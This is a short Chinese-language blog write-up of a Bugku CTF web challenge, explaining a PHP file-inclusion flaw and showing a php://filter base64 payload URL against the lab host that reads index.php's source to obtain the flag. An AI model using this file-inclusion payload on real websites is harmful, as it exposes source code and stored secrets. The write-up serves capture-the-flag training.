“ bugku-web14解題思路記錄,”
題目:click me? no
01—找線索
點擊click me? no顯示index.php,URL為http://114.67.246.176:19952/index.php?file=show.php,可能存在檔案包含漏洞,
CTF中經常使用的是php://filter和php://input
php://filter用于讀取原始碼
php://input用于執行php代碼
php://filter/read=convert.base64-encode/resource=[檔案名]
用于讀取檔案原始碼(針對php檔案需要base64編碼)
其中convert.base64-encode & convert.base64-decode
等同于base64_encode()和base64_decode(),base64編碼&解碼
resource=<要過濾的資料流>
2—構造payload
構造payload:
http://114.67.246.176:19952/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
得到base64編碼之后的原始碼:
解碼得到flag,
php很重要!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/287878.html
標籤:其他
上一篇:(2020上半年第6天)小迪網路安全筆記(操作①)sqlilabs靶機環境搭建
下一篇:2021強網杯 Web尋寶 WP